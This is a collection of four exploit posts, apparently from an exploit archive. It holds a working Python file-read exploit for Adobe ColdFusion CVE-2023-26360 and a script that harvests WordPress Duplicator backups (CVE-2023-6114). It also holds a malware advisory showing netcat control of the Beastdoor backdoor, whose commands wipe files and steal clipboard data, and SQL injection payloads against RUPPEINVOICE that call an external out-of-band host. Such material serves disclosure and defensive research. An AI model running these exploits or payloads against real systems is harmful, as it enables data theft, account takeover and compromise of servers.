<pre><code># Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360<br /># Google Dork: [not]<br /># Date: [12/28/2023]<br /># Exploit Author: [Youssef Muhammad]<br /># Vendor Homepage: [<br />https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html]<br /># Software Link: [<br />https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0]<br /># Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and<br />earlier]<br /># Tested on: [Windows, Linux]<br /># CVE : [CVE-2023-26360]<br /><br />import sys<br />import requests<br />import json<br /><br />BANNER = """<br /> ██████ ██ ██ ███████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ <br /> ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ████ <br /> ██ ██ ██ █████ █████ █████ ██ ██ ██ █████ █████ █████ █████ ███████ █████ ███████ ██ ██ ██ <br /> ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ <br /> ██████ ████ ███████ ███████ ██████ ███████ ██████ ███████ ██████ ██████ ██████ ██████ <br />"""<br /><br />RED_COLOR = "\033[91m"<br />GREEN_COLOR = "\032[42m"<br />RESET_COLOR = "\033[0m"<br /><br />def print_banner():<br /> print(RED_COLOR + BANNER + " Developed by SecureLayer7" + RESET_COLOR)<br /> return 0<br /><br />def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None):<br /> if not endpoint.endswith('.cfc'):<br /> endpoint += '.cfc'<br /><br /> if target_file.endswith('.cfc'):<br /> raise ValueError('The TARGET_FILE must not point to a .cfc')<br /><br /> targeted_file = f"a/{target_file}"<br /> json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []})<br /><br /> vars_get = {'method': 'test', '_cfclient': 'true'}<br /> uri = f'{host}{endpoint}'<br /><br /> response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None)<br /><br /> file_data = None<br /> splatter = '<!-- " ---></TD></TD></TD></TH></TH></TH>'<br /><br /> if response.status_code in [404, 500] and splatter in response.text:<br /> file_data = response.text.split(splatter, 1)[0]<br /><br /> if file_data is None:<br /> raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.')<br /><br /> print(file_data)<br /><br /> # Save the output to a file<br /> output_file_name = 'output.txt'<br /> with open(output_file_name, 'w') as output_file:<br /> output_file.write(file_data)<br /> print(f"The output saved to {output_file_name}")<br /><br />if __name__ == "__main__":<br /> if not 3 <= len(sys.argv) <= 5:<br /> print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]")<br /> sys.exit(1)<br /><br /> print_banner()<br /><br /> host = sys.argv[1]<br /> target_file = sys.argv[2]<br /> endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc"<br /> proxy_url = sys.argv[4] if len(sys.argv) > 4 else None<br /><br /> try:<br /> run_exploit(host, target_file, endpoint, proxy_url)<br /> except Exception as e:<br /> print(f"Error: {e}")<br /> <br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/6268df4c9c805c90725dde4fe5ef6fea.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Beastdoor.oq<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware listens on TCP port 1332, makes outbound connections to SMTP port 25 and executes a PE file named svchost.exe dropped in Windows directory. Third party adversaries who can reach an infected host can issue various numeric commands made available by the backdoor.<br />Family: Beastdoor<br />Type: PE32<br />MD5: 6268df4c9c805c90725dde4fe5ef6fea<br />Vuln ID: MVID-2024-0674<br />Dropped files: svchost.exe<br />Disclosure: 03/09/2024<br /><br />Commands:<br />27 return victims username and computer information<br />5 or 19 will shutdown victims computer<br />6 restart victims computer<br />9 delete all files including program files<br />16 victim computer screen goes black<br />28 returns clipboard information<br />30 terminates the backdoor and deletes it from the system<br /><br />Exploit/PoC:<br />C:\sec>nc64.exe x.x.x.x 1332<br />27<br />27<br />VICTIM DESKTOP-2C3IQHO Windows 8.1 Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHzC:\WINDOWS\C:\WINDOWS\system32\1565 x 8302.01svchost.exe svchost.exe<br />28<br />28<br />I dont like u<br />30<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 -<br />Unauthenticated Sensitive Data Exposure to Account Takeover<br /># Google Dork: inurl:("plugins/duplicator/")<br /># Date: 2023-12-04<br /># Exploit Author: Dmitrii Ignatyev<br /># Vendor Homepage:<br />https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free<br /># Software Link: https://wordpress.org/plugins/duplicator/<br /># Version: 1.5.7.1<br /># Tested on: Wordpress 6.4<br /># CVE : CVE-2023-6114# CVE-Link :<br />https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/<br /><br /># CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/A<br />severe vulnerability has been discovered in the directory<br />*/wordpress/wp-content/backups-dup-lite/tmp/*. This flaw not only<br />exposes extensive information about the site, including its<br />configuration, directories, and files, but more critically, it<br />provides unauthorized access to sensitive data within the database and<br />all data inside. Exploiting this vulnerability poses an imminent<br />threat, leading to potential *brute force attacks on password hashes<br />and, subsequently, the compromise of the entire system*.*<br />POC*:<br /><br />1) It is necessary that either the administrator or auto-backup works<br />automatically at the scheduled time<br /><br />2) Exploit will send file search requests every 5 seconds<br /><br />3) I attack the site with this vulnerability using an exploit<br /><br />Exploit sends a request to the server every 5 seconds along the path<br />“*http://your_site/wordpress/wp-content/backups-dup-lite/tmp/<br /><http://your_site/wordpress/wp-content/backups-dup-lite/tmp/>”* and if<br />it finds something in the index of, it instantly parses all the data<br />and displays it on the screen<br /><br />Exploit (python3):<br /><br />import requests<br />from bs4 import BeautifulSoup<br />import re<br />import time<br /><br />url = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/"<br />processed_files = set()<br /><br />def get_file_names(url):<br /> response = requests.get(url)<br /><br /> if response.status_code == 200 and len(response.text) > 0:<br /> soup = BeautifulSoup(response.text, 'html.parser')<br /> links = soup.find_all('a')<br /><br /> file_names = []<br /> for link in links:<br /> file_name = link.get('href')<br /> if file_name != "../" and not file_name.startswith("?"):<br /> file_names.append(file_name)<br /><br /> return file_names<br /> return []<br /><br />def get_file_content(url, file_name):<br /> file_url = url + file_name<br /><br /><br /> if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE):<br /> print(f"Ignoring file: {file_name}")<br /> return None<br /><br /> file_response = requests.get(file_url)<br /><br /> if file_response.status_code == 200:<br /> return file_response.text<br /> return None<br /><br />while True:<br /> file_names = get_file_names(url)<br /><br /> if file_names:<br /> print("File names on the page:")<br /> for file_name in file_names:<br /> if file_name not in processed_files:<br /> print(file_name)<br /> file_content = get_file_content(url, file_name)<br /><br /> if file_content is not None:<br /> print("File content:")<br /> print(file_content)<br /> processed_files.add(file_name)<br /><br /> time.sleep(5)<br /><br /><br /><br />-- <br />With best regards,<br />Dmitrii Ignatyev, Penetration Tester<br /><br /></code></pre>
<pre><code>## Title: RUPPEINVOICE-1.0 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 03/09/2024<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The username parameter appears to be vulnerable to SQL injection<br />attacks. The payload '+(select<br />load_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+'<br />was submitted in the username parameter. This payload injects a SQL<br />sub-query that calls MySQL's load_file function with a UNC file path<br />that references a URL on an external domain. The application<br />interacted with that domain, indicating that the injected SQL query<br />was executed. The attacker can get all information from the system by<br />using this vulnerability!<br /><br />STATUS: HIGH- Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: username=zBuveHif'+(select<br />load_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+''<br />OR NOT 6356=6356 AND 'Eocq'='Eocq&password=g7J!m3v!W2&login=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=zBuveHif'+(select<br />load_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+''<br />AND (SELECT 4013 FROM (SELECT(SLEEP(7)))BnHP) AND<br />'bCQt'='bCQt&password=g7J!m3v!W2&login=<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/RUPPEINVOICE-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/03/ruppeinvoice-10-multiple-sqli.html)<br /><br />## Time spend:<br />00:35:00<br /><br /><br /></code></pre>